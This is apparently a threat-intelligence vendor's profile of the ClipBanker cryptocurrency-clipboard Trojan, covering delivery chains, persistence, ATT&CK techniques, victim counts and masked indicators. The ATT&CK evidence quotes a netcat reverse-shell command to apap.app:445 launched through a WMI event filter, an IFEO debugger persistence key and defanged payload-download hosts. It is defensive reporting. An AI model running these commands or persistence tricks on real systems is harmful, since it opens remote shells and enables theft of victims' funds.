Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Malware

ClipBanker

ClipBanker is a clipboard-hijacking cryptocurrency theft Trojan that monitors the victim’s clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses. Across the provided reporting, it is consistently described as targeting crypto assets and wallet formats spanning numerous blockchain networks, including Bitcoin, Ethereum, Solana, Monero, Dogecoin, TRON, Ripple, Litecoin and many others.

Observed delivery and execution chains include fake software downloads, trojanized installers, phishing and ClickFix-style lures, fake CAPTCHA/reCAPTCHA verification pages, MSHTA-driven infection chains, SourceForge-hosted fake Microsoft Office downloads, and a fake GitHub repository distributing a trojanized Proxifier installer. In one SourceForge campaign, AutoIt-based components injected a miner and ClipBanker, while additional tooling established persistence, Telegram-based telemetry exfiltration, and a reverse shell to apap[.]app:445. In another campaign, the final ClipBanker payload was injected into fontdrvhost.exe after a long fileless chain involving Defender exclusions, in-memory PowerShell, registry-stored scripts, scheduled tasks, and payload retrieval from Pastebin-like services and GitHub.

Persistence mechanisms directly mentioned include Windows registry Run keys, scheduled tasks, App Paths registry hijacking, services, Image File Execution Options debugger abuse, WMI event filters/consumers, and registry-stored PowerShell launched at logon. One Kaspersky compromise-assessment case identified a ClipBanker variant persisting via HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp on a user workstation. Bitdefender also reported a ClipBanker chain using a remote HTA from asd[.]s7610rir[.]pw/win/checking[.]hta, downloading checking.ps1 from 185[.]208[.]159[.]199 and additional payloads including ichigo-lite.ps1 and del.ps1 from 87[.]96[.]21[.]84, with scheduled task names masquerading as legitimate services such as Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237.

Implementation details in the content include C++/MinGW builds, AutoIt-based loaders/injectors, and variants that may avoid network communication entirely once deployed, focusing solely on clipboard monitoring and address substitution. ClipBanker also appears as a module within LummaC2/LummaStealer-related activity, where it performs wallet-address replacement. It is additionally referenced in campaigns associated with ViperSoftX operators, alongside QuasarRAT and PureRAT, for cryptocurrency wallet theft and remote control.

Victimology in the provided material centers on cryptocurrency users and financially motivated campaigns. Kaspersky’s 2024 financial threat reporting states ClipBanker accounted for 62.9% of users attacked by financial PC malware in 2024. Campaign telemetry cited in the content includes more than 2,000 encountered users in a trojanized Proxifier campaign, mainly in India and Vietnam, and 4,604 users exposed to the SourceForge fake Office campaign, with 90% of potential victims in Russia.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

31 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583Acquire InfrastructureEvidence1

Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge... Pages like that are well-indexed by search engines and appear in their search results.

T1608.006SEO PoisoningEvidence1

A user searches for “Proxifier” on a popular search engine, and one of the top results points directly to the malicious GitHub repository ... The attackers have been actively pushing their malicious GitHub repository up through search engine results.

Execution

7 techniques
T1053.005Scheduled TaskEvidence2

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1059Command and Scripting InterpreterEvidence1

This essentially creates a remote command line with apap[.]app:445 as the C2 server.

T1059.001PowerShellEvidence3

the VB script runs a PowerShell interpreter to download and execute a batch file, confvk , from GitHub.

T1059.003Windows Command ShellEvidence1

This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.

T1059.005Visual BasicEvidence2

The installer then executes an embedded Visual Basic script.

T1204User ExecutionEvidence1

Many of the attack chains presented in this article rely on user interaction... users are manipulated through social engineering into willingly executing malicious commands copied to the clipboard.

T1574.001DLLEvidence1

Icon.dll Clean dynamic-link library with a compressed AutoIt script appended to it Kape.dll Clean dynamic-link library with a compressed AutoIt script appended to it... These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll

Persistence

6 techniques
T1053.005Scheduled TaskEvidence2

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1112Modify RegistryEvidence2

The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.

T1543.003Windows ServiceEvidence1

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter

T1546.003Windows Management Instrumentation Event SubscriptionEvidence1

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost . exe -- ssl apap . app 445 - e cmd . exe

T1546.012Image File Execution Options InjectionEvidence1

Additionally, as a backup autostart method, confvz adds this registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" :: Debugger = "%WINDIR%\System32\cmd.exe /c start start.exe"

T1547.001Registry Run Keys / Startup FolderEvidence3

...разновидность стилера ClipBanker, закрепившаяся в системе через раздел реестра HKU\S-1-5-21-[СКРЫТО]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.

Privilege Escalation

6 techniques
T1053.005Scheduled TaskEvidence2

The role of this script is to ensure Windows Defender exclusions and persistence... The scheduled task names masquerade as services that sound legitimate.

T1055Process InjectionEvidence2

Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.

T1543.003Windows ServiceEvidence1

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter

T1546.003Windows Management Instrumentation Event SubscriptionEvidence1

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds... The handler executes the following command: ShellExperienceHost . exe -- ssl apap . app 445 - e cmd . exe

T1546.012Image File Execution Options InjectionEvidence1

Additionally, as a backup autostart method, confvz adds this registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" :: Debugger = "%WINDIR%\System32\cmd.exe /c start start.exe"

T1547.001Registry Run Keys / Startup FolderEvidence3

...разновидность стилера ClipBanker, закрепившаяся в системе через раздел реестра HKU\S-1-5-21-[СКРЫТО]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.

Stealth

10 techniques
T1027Obfuscated Files or InformationEvidence2

The HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.

T1027.001Binary PaddingEvidence1

Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes.

T1036MasqueradingEvidence3

The downloaded archive contains another password-protected archive, installer.zip... Inside installer.zip is a file named installer.msi . This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer.

T1055Process InjectionEvidence2

Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker.

T1140Deobfuscate/Decode Files or InformationEvidence1

The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.

T1218.005MshtaEvidence2

The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.

T1497.001System ChecksEvidence1

the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

T1564.001Hidden Files and DirectoriesEvidence1

This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.

T1564.003Hidden WindowEvidence1

First, it sets the MSHTA window to 1x1 pixels, starts it minimized, and hides it from the taskbar to evade detection.

T1574.001DLLEvidence1

Icon.dll Clean dynamic-link library with a compressed AutoIt script appended to it Kape.dll Clean dynamic-link library with a compressed AutoIt script appended to it... These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll

Defense Impairment

1 technique
T1112Modify RegistryEvidence2

The PowerShell script handles several key tasks: it ... stores an encoded script inside a registry key at HKLM\SOFTWARE\System::Config.

Discovery

2 techniques
T1082System Information DiscoveryEvidence1

The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.

T1497.001System ChecksEvidence1

the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

Collection

2 techniques
T1115Clipboard DataEvidence4

ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own.

T1560Archive Collected DataEvidence1

The downloaded archive contains another password-protected archive, installer.zip , and a Readme.txt file with the password.

Command and Control

3 techniques
T1071Application Layer ProtocolEvidence1

One of the PowerShell scripts sends a message to a certain chat using the Telegram API.

T1105Ingress Tool TransferEvidence3

the VB script runs a PowerShell interpreter to download and execute a batch file, confvk , from GitHub... The other PowerShell script downloads another batch file, confvz

T1219Remote Access ToolsEvidence1

ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection.

Other

2 techniques
T1562.001Disable or Modify ToolsEvidence3

This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.

T1562Impair DefensesEvidence1

The final, deobfuscated version of the PowerShell script consists of two parts. The first one is an AMSI bypass by patching clr.dll...

INDICATORS OF COMPROMISE

IOCs tracked for this family

48 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
20 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
10 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
18 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app4 days ago
domain●●●●●●●●●●●●View more in app1 month ago
uri●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
ACTIVITY FEED

Recent activity

11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching48

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping31

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.